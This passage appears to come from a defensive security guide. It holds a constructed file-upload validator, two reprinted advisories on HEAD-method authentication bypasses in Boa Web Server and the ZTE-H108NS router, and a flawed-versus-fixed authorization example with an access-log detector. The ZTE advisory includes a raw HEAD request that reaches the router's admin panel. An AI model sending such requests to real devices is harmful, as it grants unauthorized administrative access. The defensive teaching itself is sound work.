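Added example; this is not Roxy Fileman's code and does not model its
configuration. The policy, magic numbers and sample names are constructed.
The allowlist decides on the last extension only, case-insensitively, folds
every inner dot into an underscore so no second extension survives, and refuses
content that carries a PHP open tag or does not match its declared type.
"""
import re

ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}   # constructed policy
PHP_TAG_RE = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)           # long and short open tags
MAGIC = {   # leading bytes expected for the types we can check
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}
CANONICAL = {"jpeg": "jpg"}


def validate_upload(filename, content):
    """Return (stored_name, None) when acceptable, else (None, reason)."""
    # Drop any client-supplied directory and Windows-style trailing dots/spaces,
    # which a filesystem would strip and thereby resurrect a blocked extension.
    name = filename.replace("\\", "/").rsplit("/", 1)[-1].strip().rstrip(". ")
    if not name or name.startswith("."):
        return None, "empty or hidden filename"
    parts = name.split(".")
    if len(parts) < 2:
        return None, "missing extension"
    ext = parts[-1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return None, f"extension .{ext} is not in the allowlist"
    if PHP_TAG_RE.search(content):
        return None, "content contains a PHP open tag"
    kind = CANONICAL.get(ext, ext)
    if kind in MAGIC and not content.startswith(MAGIC[kind]):
        return None, f"content does not look like a .{ext} file"
    # "a.php.jpg" is stored as "a_php.jpg": only one extension ever reaches disk.
    stem = re.sub(r"[^A-Za-z0-9_-]", "_", ".".join(parts[:-1]))
    return f"{stem}.{ext}", None


def audit_upload_dir(names):
    """Detection for existing installs: stored files whose extension the policy forbids."""
    flagged = []
    for n in names:
        ext = n.rstrip(". ").rsplit(".", 1)[-1].lower() if "." in n else ""
        if ext not in ALLOWED_EXTENSIONS:
            flagged.append(n)
    return flagged
```

The extension check runs before the content check on purpose: a rejected extension is the cheaper and more reliable signal, and the content check exists for the allowed types, where a PHP tag inside a `.txt` or a JPEG header missing from a `.png` is the anomaly worth refusing.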
<pre><code># Exploit Title: Boa Web Server 0.94.13-0.94.14 Authentication Bypass<br /># Date: 19-11-2022<br /># Exploit Author: George Tsimpidas<br /># Vendor: https://github.com/gpg/boa<br /># CVE: N/A<br /># Tested on: Debian 5.18.5<br /><br />Description :<br /><br />Boa Web Server versions 0.94.13 - 0.94.14 fail to apply the<br />security constraint to the HEAD HTTP method, allowing anyone<br />to bypass the Basic Authorization mechanism.<br /><br />Culprit :<br /><br />if (!memcmp(req->logline, "GET ", 4))<br />req->method = M_GET;<br />else if (!memcmp(req->logline, "HEAD ", 5))<br />/* head is just get w/no body */<br />req->method = M_HEAD;<br />else if (!memcmp(req->logline, "POST ", 5))<br />req->method = M_POST;<br />else {<br />log_error_doc(req);<br />fprintf(stderr, "malformed request: \"%s\"\n", req->logline);<br />send_r_not_implemented(req);<br />return 0;<br />}<br /><br />The req->method = M_HEAD; value is then tested directly in the response.c<br />file. Looking at how the method is handled for one of the<br />response codes :<br /><br />/* R_NOT_IMP: 505 */<br />void send_r_bad_version(request * req)<br />{<br /> SQUASH_KA(req);<br /> req->response_status = R_BAD_VERSION;<br /> if (!req->simple) {<br /> req_write(req, "HTTP/1.0 505 HTTP Version Not Supported\r\n");<br /> print_http_headers(req);<br /> req_write(req, "Content-Type: " HTML "\r\n\r\n"); /* terminate header */<br /> }<br /> if (req->method != M_HEAD) {<br /> req_write(req,<br /> "<HTML><HEAD><TITLE>505 HTTP Version Not Supported</TITLE></HEAD>\n"<br /> "<BODY><H1>505 HTTP Version Not Supported</H1>\nHTTP versions "<br /> "other than 0.9 and 1.0 "<br /> "are not supported in Boa.\n<p><p>Version encountered: ");<br /> req_write(req, req->http_version);<br /> req_write(req, "<p><p></BODY></HTML>\n");<br /> }<br /> req_flush(req);<br />}<br /><br /><br />The condition if (req->method != M_HEAD) in the code above means that<br />only when the requested method is not HEAD does the server write the body:<br /><br />req_write(req,<br /> "<HTML><HEAD><TITLE>505 HTTP Version Not Supported</TITLE></HEAD>\n"<br /> "<BODY><H1>505 HTTP Version Not Supported</H1>\nHTTP versions "<br /> "other than 0.9 and 1.0 "<br /> "are not supported in Boa.\n<p><p>Version encountered: ");<br /> req_write(req, req->http_version);<br /> req_write(req, "<p><p></BODY></HTML>\n");<br /> }<br /><br />So a request whose method is HEAD passes through this same check in every<br />response function, for all of the response codes.<br /></code></pre>
<pre><code># Exploit Title: Router ZTE-H108NS - Authentication Bypass<br /># Date: 19-11-2022<br /># Exploit Author: George Tsimpidas<br /># Vendor: https://www.zte.com.cn/global/<br /># Firmware: H108NSV1.0.7u_ZRD_GR2_A68<br /># CVE: N/A<br /># Tested on: Debian 5.18.5<br /><br />Description :<br /><br />When specific HTTP methods are listed within a security constraint,<br />only those methods are protected. Router ZTE-H108NS defines the following HTTP<br />methods: GET, POST, and HEAD. The HEAD method appears to fall under a flawed<br />code path that lets a HEAD request be served with every<br />response status code.<br /><br /><br />Proof Of Concept :<br /><br />The request below successfully bypasses Basic Authentication and<br />grants access to the router's Administration Panel.<br /><br /><br />HEAD /cgi-bin/tools_admin.asp HTTP/1.1<br />Host: 192.168.1.1<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />DNT: 1<br />Connection: close<br />Cookie: SESSIONID=1cd6bb77<br />Upgrade-Insecure-Requests: 1<br />Cache-Control: max-age=0<br /></code></pre>
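The Boa and ZTE-H108NS advisories above describe the same class of bug: a security constraint that names the methods it protects, so a method it does not name (HEAD) reaches the protected handler without credentials. The example below puts the flawed gate next to the fixed one and adds the detection a defender would run over an access log: HEAD requests that received a 2xx on a protected path with no authenticated user. It is an added example and not code from either product; the protected prefixes, the credential table, the Combined Log Format lines and the IP addresses are constructed.

```python
"""Authorizing HEAD like GET, and spotting the bypass in access logs.

Added example for the Boa and ZTE-H108NS advisories above; it is not code from
either product. The flawed gate models a server whose security constraint names
the methods it protects, so anything unlisted (here, HEAD) falls through. The
fixed gate decides on credentials before the method matters at all. The policy,
credentials and log lines are constructed.
"""
import base64
import hmac
import re

PROTECTED_PREFIXES = ("/cgi-bin/", "/admin/")               # constructed policy
CREDENTIALS = {"admin": "correct horse battery staple"}    # constructed; store hashes in real code


def basic_header(user, password):
    """Build an Authorization: Basic value (used by the samples and tests)."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def _basic_ok(auth_header):
    """Validate a Basic credential; constant-time comparison, no user enumeration."""
    if not auth_header or not auth_header.startswith("Basic "):
        return False
    try:
        user, _, password = base64.b64decode(auth_header[6:]).decode().partition(":")
    except (ValueError, UnicodeDecodeError):
        return False
    expected = CREDENTIALS.get(user)
    return expected is not None and hmac.compare_digest(expected.encode(), password.encode())


def flawed_authorize(method, path, auth_header):
    """Vulnerable pattern: the constraint lists GET and POST, so HEAD is never checked."""
    if not path.startswith(PROTECTED_PREFIXES):
        return True
    if method in ("GET", "POST"):
        return _basic_ok(auth_header)
    return True   # HEAD (and any other method) reaches the protected handler


def authorize(method, path, auth_header):
    """Fixed pattern: HEAD is GET without a body (Boa's own comment says so), so it
    carries the same credential requirement; unknown methods are refused, not waved through."""
    if not path.startswith(PROTECTED_PREFIXES):
        return True
    if method not in ("GET", "HEAD", "POST"):
        return False
    return _basic_ok(auth_header)


# Combined Log Format: the third field is the authenticated user, "-" when absent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)


def find_head_bypass(log_lines):
    """Return (ip, path) for HEAD requests that got a 2xx on a protected path with no user."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        if (m["method"] == "HEAD" and m["path"].startswith(PROTECTED_PREFIXES)
                and m["user"] == "-" and m["status"].startswith("2")):
            hits.append((m["ip"], m["path"]))
    return hits


# Constructed access-log lines: a refused GET, an authenticated GET, the bypass, and a public HEAD.
SAMPLE_LOG = [
    '192.168.1.50 - - [19/Nov/2022:10:00:01 +0000] "GET /cgi-bin/tools_admin.asp HTTP/1.1" 401 0 "-" "Mozilla/5.0"',
    '192.168.1.50 - admin [19/Nov/2022:10:00:05 +0000] "GET /cgi-bin/tools_admin.asp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.1.77 - - [19/Nov/2022:10:01:00 +0000] "HEAD /cgi-bin/tools_admin.asp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.1.77 - - [19/Nov/2022:10:01:02 +0000] "HEAD /index.html HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
]
```

The structural point is the order of decisions: in the fixed gate the credential check runs for every method that is allowed at all, and the method list only decides what is implemented, never whether authorization applies. On a device that cannot be patched, the log scan above is the compensating control; a HEAD to a protected path with no user and a 2xx is the signature of the requests shown in both advisories.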